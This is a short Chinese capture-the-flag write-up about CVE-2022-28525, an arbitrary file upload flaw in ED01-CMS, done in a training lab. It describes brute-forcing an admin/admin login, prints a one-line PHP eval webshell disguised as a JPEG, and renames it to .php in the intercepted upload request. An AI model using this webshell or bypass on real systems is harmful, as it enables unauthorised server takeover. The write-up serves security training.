春秋云境 | 文件上传 | CVE-2022-28525

目录

靶标介绍

开启靶场

蚁剑连接

[获取 flag](#获取 flag)


靶标介绍

ED01-CMS v20180505 存在任意文件上传漏洞

开启靶场

发现了一个登录功能,使用 burp 爆破一下

爆破之后得到账号是 admin 密码是 admin,登录后是这样的页面

在左边的菜单栏挨着一个一个找,发现这个地方可以编辑用户的信息,可以修改头像上传头像

构造一个一句话木马,重命名为 1.jpg

1.jpg:
<?php @eval($_POST[cmd]);?>

勾选 new image,上传 1.jpg, 然后抓包,修改后缀为 php,然后放包

放包之后,发现上传成功,右击复制图片链接

蚁剑连接

在根目录发现了 flag

获取 flag

相关推荐
newxtc5 分钟前
【支付行业-支付系统架构及总结】
安全·支付宝·第三方支付·风控系统·财付通
newxtc36 分钟前
【旷视科技-注册/登录安全分析报告】
人工智能·科技·安全·ddddocr
成都古河云37 分钟前
智慧场馆:安全、节能与智能化管理的未来
大数据·运维·人工智能·安全·智慧城市
Gworg37 分钟前
您与此网站之间建立的连接不安全解决方法
安全
follycat1 小时前
[极客大挑战 2019]HTTP 1
网络·网络协议·http·网络安全
ac-er88882 小时前
MySQL如何实现PHP输入安全
mysql·安全·php
天行健PLUS2 小时前
【经验分享】六西格玛管理培训适合哪些人参加?
经验分享
小奥超人3 小时前
PPT文件设置了修改权限,如何取消权?
windows·经验分享·microsoft·ppt·办公技巧
jjyangyou5 小时前
物联网核心安全系列——物联网安全需求
物联网·算法·安全·嵌入式·产品经理·硬件·产品设计
AltmanChan5 小时前
大语言模型安全威胁
人工智能·安全·语言模型